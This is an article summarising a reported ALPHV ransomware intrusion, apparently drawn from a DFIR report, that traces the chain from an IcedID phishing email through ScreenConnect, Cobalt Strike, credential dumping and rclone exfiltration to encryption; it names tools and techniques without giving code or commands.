Recently, a cyber attack utilizing ransomware was reported, showcasing the hackers’ ability to exploit victims’ data until a ransom is paid. This method has been lucrative for cybercriminals as it capitalizes on the criticality and necessity of data for individuals and organizations, leaving them with little choice but to comply with the demands in order to recover their valuable information.
The attack initiated through an email containing a forked IcedID variant that highlighted payload delivery. Once the initial access was gained, the intruder proceeded to install ScreenConnect on the compromised computer for remote control. They also utilized Cobalt Strike beacons abusively and deployed CSharp Streamer RAT to gain credentials and move laterally within domain controllers and servers.
Sensitive information was identified and stored in a program known as ‘confucius_cpp,’ with rclone being used for the extraction process. Over the course of eight days, the attackers systematically deployed ScreenConnect installers across hosts using WMI before ultimately delivering ALPHV ransomware payloads following the deletion of backups.
The deployment of the ALPHV ransomware was orchestrated through malicious spam emails, tricking the victims into downloading and unzipping a folder that contained a Visual Basic Script (VBS). Upon activation of the VBS, an obfuscated IcedID loader DLL was executed, which then dropped and executed another IcedID DLL payload, completing the infection chain as per the DFIR report.
The threat actor leveraged ScreenConnect remote access tools using disguised installation programs that operated through wmiexec and RDP sessions. Various techniques were employed to extract Cobalt Strike beacons, including bitsadmin, certutil, and PowerShell. CSharp Streamer RAT maintained persistence through scheduled tasks in LSASS credential dumping, lateral movement, and C2 communications.
During the lateral movement into key system processes like winlogon.exe and rundll32.exe, process injection was observed, and renamed installers were removed by the attacker. The attackers also engaged in LSASS credential dumping and conducted dcsync from the initial entry point to a domain controller for credential harvesting.
The reconnaissance phase involved using native Windows utilities launched through IcedID, followed by further reconnaissance commands through ScreenConnect. The attackers also performed network scanning using SoftPerfect netscan on different days, targeting specific IP ranges and ports to identify potential vulnerabilities.
ScreenConnect installers were laterally copied via SMB and deployed using wmiexec.py for remote control. RDP was extensively utilized for lateral movement, with the attackers also leveraging CSharp Streamer for proxying. Prior to exfiltration, a custom tool called confucius_cpp was used to enumerate systems, access shares based on keywords, and compress sensitive information.
Multiple tools were employed during the intrusion, including IcedID for initial access, Cobalt Strike beacons for communication, CSharp Streamer RAT for C2 communications, and ScreenConnect remote access tools for control and reconnaissance. The attackers utilized Firefox for document preview and downloading rclone for data exfiltration.
The final payload was the ALPHV ransomware, which was staged on the backup server and then distributed across hosts via xcopy and WMI-initiated execution after the deletion of backups. A ransom note referencing the group’s Twitter handle was left post-encryption, signifying the completion of the attack.
In conclusion, the ransomware attack demonstrated the sophisticated tactics employed by cybercriminals to infiltrate systems, exfiltrate data, and deploy ransomware payloads for financial gain. Organizations must remain vigilant and ensure robust cybersecurity measures to protect against such malicious activities.